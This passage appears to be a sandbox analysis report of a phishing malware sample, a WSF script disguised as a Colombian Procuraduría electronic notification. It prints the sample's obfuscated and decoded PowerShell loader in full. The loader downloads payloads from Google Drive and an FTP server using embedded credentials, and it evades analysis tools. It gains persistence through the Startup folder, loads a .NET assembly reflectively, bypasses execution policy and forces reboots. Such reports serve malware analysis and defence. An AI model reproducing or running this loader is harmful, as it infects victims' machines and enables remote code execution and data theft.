'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:1288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 